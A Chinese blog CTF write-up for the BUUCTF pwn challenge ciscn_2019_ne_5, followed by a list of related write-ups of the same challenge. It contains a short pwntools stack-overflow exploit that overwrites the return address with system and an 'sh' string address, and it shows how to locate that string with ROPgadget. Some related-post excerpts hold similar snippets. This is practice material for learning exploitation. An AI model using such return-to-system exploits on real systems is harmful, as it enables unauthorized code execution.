BUUCTF(pwn)ciscn_2019_ne_5

最新推荐文章于 2023-11-29 22:56:29 发布
最新推荐文章于 2023-11-29 22:56:29 发布
阅读量197 收藏
点赞数 1
分类专栏: pwn题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556441/article/details/115324004
版权

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
先点进去 cat flag 说了 在 1 log中
在这里插入图片描述在这里插入图片描述

from pwn import*
r=remote('node3.buuoj.cn',26204)
sys=0x80486b9
sh=0x080482ea
r.sendlineafter("Please input admin password:",administrator)
r.sendlineafter("0.Exit\n:",1)
payload='a'*(0x48+4)+p32(sys)+p32(sh)
r.sendlineafter("Please input new log info:",payload)
r.sendlineafter("0.Exit\n:",4)
r.interactive()

这道题只给了 sys的地址, 那么 ‘bin/sh’ ‘sh’ 可能也是存在的;

手动查找一下其地址

命令ROPgadget --binary 文件 --string 'sh'
在这里插入图片描述

半岛铁盒@
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
buuctf ciscn_2019_ne_5
carol2358的博客
04-21 1085
ret2text 覆盖dest需要0x48+0x4,sh可以用gdb的find找到,别忘了写4个字符的返回地址 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_ne_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' ...
ciscn_2019_ne_5【BUUCTF
qq_41696518的博客
08-31 522
ciscn_2019_ne_5 BUUCTF
BUUCTFPWNciscn_2019_ne_5
m0_55368674的博客
01-15 167
BUUCTFPWNciscn_2019_ne_5
BUUCTF-pwn-ciscn_2019_ne_51
最新发布
qq_30528603的博客
11-29 138
我们看到strcpy是将src的内容复制到dest。我们前面看到src允许我们输入128个字节。而dest数组离ebp只有0x48个字节。32为程序没有canary没有PIE,应该是简单的栈溢出。程序上来是输入一个密码验证。随便输入下错误直接退出。那么我们需要构造的东西都有了,接着就是找溢出点。它会把我们的输入放入src这个数组中。主函数大致流程在此。当找不到/bin/sh的时候,可以用sh代替。这里就有一个小技巧了。
ciscn_2019_ne_5
z1r0的博客
12-05 101
ciscn_2019_ne_5 查看保护 密码已经给了我们,直接上去然后就看见了三个选项,没有4,ida之后才看见了。 看一下add和getflag这两个函数 add这里的a1就是main中的src。 getflag中将src给copy到dest中,dest离ebp有0x48大小。而src离ebp有0xfc个大小,可以通过add写入rop的payload,然后让getflag来执行这个rop。这题可以正常的ret2libc也可以ret2text,这题的shell是/sh,一开始年朝着/bin/sh
BUU-ciscn_2019_ne_5
qq_45771413的博客
04-27 306
检查保护 IDA 逻辑不是很复杂, 第一次提示输入admin密码,密码要输入administrator才能下一步 接着是输入功能选项(0~3) 第一个输入,看起来没啥用,但是传入的是src字符串,返回的也是src 第二个输出,进去只有一个put,一无所有 第三个是打印,里面发现了system函数 第四个本应该是’0’选项,这里多了个’4’,函数名叫getflag,进去看是个输出flag的函数,初步预测跳转到这里就可以了。 第五个才是’0’的退出 int __cdecl main(int argc,
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
[BUUCTF]PWN——ciscn_2019_ne_5
mcmuyanga的博客
10-04 1939
ciscn_2019_ne_5 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看一下程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串 双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag 看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞 根据之前那个flag的提示,之后我们应该选1,添加一个log,之后
[BUUCTF-pwn]——ciscn_2019_ne_5
Y_peak的博客
02-11 371
[BUUCTF-pwn]——ciscn_2019_ne_5 题目地址:https://buuoj.cn/challenges#ciscn_2019_ne_5 checksec下 在IDA中,竟然不给我反汇编,第一次碰到. 查了下解决方法,在反汇编失败的地方,单独反汇编就好. int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // [esp+0h] [ebp-100h] char src[4]
BUUCTF ciscn_2019_ne_5
doudoudedi
01-06 785
这道题是一道典型的ROP一开始没找到参数~~ 直接溢出emem exp(其实我写的很麻烦了很简单的) #!/usr/bin/python2 from pwn import * local=1 if local==1: p=process('../binary/ciscn_2019_ne_5') elf=ELF('../binary/ciscn_2019_ne_5') libc=elf.lib...
BUUCTF 刷题 ciscn_2019_ne_5
Helloity的博客
02-10 2296
先附上题目地址:BUUCTF在线评测 首当其冲checksec,开启了NX保护,32位程序。 Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 还是蛮有意思的一道题,我的IDA有些问题,无法f5主函数,那么就看汇编。我先运行了一下题目,发现要我们输入一个密码,但
BUUCTF-Pwn-ciscn_2019_ne_5
餐桌上的猫
03-25 124
exp from pwn import* elf=ELF('/home/lhb/桌面/ciscn_2019_ne_5') p=remote('node4.buuoj.cn',28555) str_sh=0x80482EA system_plt=elf.plt['system'] p.sendline(b'administrator') p.sendline(b'1') payload=b'a'*(0x48+4)+p32(system_plt)+b'a'*4+p32(str_sh) p.sendline(
ciscn_2019_n_5
、moddemod
06-17 301
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './ciscn_2019_n_5' # p = process(proc_name) p = remote('node3.buuoj.cn', 28451) elf = ELF(proc_name) p.sendline('a'.encode()).
BUUCTF pwn wp 16 - 20
fa1c4的blog
08-24 497
[HarekazeCTF2019]baby_rop int __cdecl main(int argc, const char **argv, const char **envp) { char v4[16]; // [rsp+0h] [rbp-10h] BYREF system("echo -n \"What's your name? \""); __isoc99_scanf("%s", v4); printf("Welcome to the Pwn World, %s!\n", v4
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半岛铁盒@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值